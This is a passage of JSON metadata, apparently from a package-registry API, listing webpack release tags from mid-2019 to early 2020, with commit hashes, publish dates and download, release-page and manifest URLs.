//repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack